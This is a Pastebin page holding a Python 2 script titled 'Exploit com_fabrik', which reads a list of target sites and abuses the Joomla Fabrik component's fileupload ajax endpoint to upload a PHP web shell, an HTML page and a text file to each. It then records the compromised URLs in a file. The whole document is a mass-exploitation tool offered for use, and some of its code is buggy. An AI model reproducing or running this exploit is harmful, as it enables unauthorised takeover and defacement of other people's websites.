Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python2
- # How to use
- # python com_fabrik.py target.txt
- import requests
- import json
- import sys
- import urllib3
- shl = "shell.php"
- htm = "index.htm"
- txt = "file.txt"
- urllib3.disable_warnings()
- print """====================================================
- || Exploit com_fabrik ||
- || Backbox Indonesia Version ||
- ====================================================
- """
- arg = open(sys.argv[1], 'r').read().split('\n')
- for i in arg:
- if not i:
- break
- url = str(i) + str('/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload')
- files = {'file': open(shl, 'rb')}
- try: r = requests.post(url, files=files, verify=False, timeout=5)
- except requests.ConnectionError: continue
- except requests.exceptions.Timeout: continue
- except ValueError: continue
- content = r.content
- print "[!] Target : {}".format(i)
- print "[*] Uploading shell.."
- try: jso = json.loads(content)
- except ValueError:
- print "[-] Can't upload shell..\n"
- continue
- try: shel = jso['uri']
- except KeyError:
- print "[-] Shell can't be upload..\n"
- continue
- try: req = requests.get(shel, verify=False, timeout=5)
- except ValueError:
- print "[-] Shell can't be upload.."
- hatm = {'file': open(htm, 'rb')}
- try: rh = requests.post(url, files=hatm, verify=False, timeout=5)
- except ValueError: continue
- ch = rh.content
- print "[*] Uploading htm.."
- jh = json.loads(ch)
- sh = jh['uri']
- try: rq = requests.get(sh, verify=False, timeout=5)
- except ValueError:
- print "[-] Can't upload htm.."
- tex = {'file': open(txt, 'rb')}
- try: rt = requests.post(url, files=tex, verify=False, timeout=5)
- except ValueError: continue
- ct = rt.content
- print "[*] Uploading txt.."
- jt = json.loads(ct)
- ut = jt['uri']
- try: rgt = requests.get(ut, verify=False, timeout=5)
- except ValueError:
- print "[-] Can't upload txt..\n"
- continue
- stt = ut.status_code
- if int(stt) == 200:
- print "[+] Txt uploaded : {} [OK]\n".format(ut)
- et = "{}\n".format(st)
- open('sukses.txt', 'a').write(et)
- else:
- print "[-] Txt can't be upload..\n"
- continue
- st = rq.status_code
- if int(st) == 200:
- print "[+] Htm uploaded : {} [OK]\n".format(sh)
- seh = "{}\n".format(sh)
- open('sukses.txt', 'a').write(seh)
- else:
- print "[-] Htm can't be upload..\n"
- continue
- stat = req.status_code
- if int(stat) == 200:
- print "[+] Shell uploaded : {} [OK]\n".format(shel)
- sep = "{}\n".format(shel)
- open('sukses.txt', 'a').write(sep)
- else:
- print "[-] Shell can't be upload..\n"
- print "[+] Saved to : sukses.txt"
- print "[!] Exploit compleated.."
Advertisement
Add Comment
Please, Sign In to add comment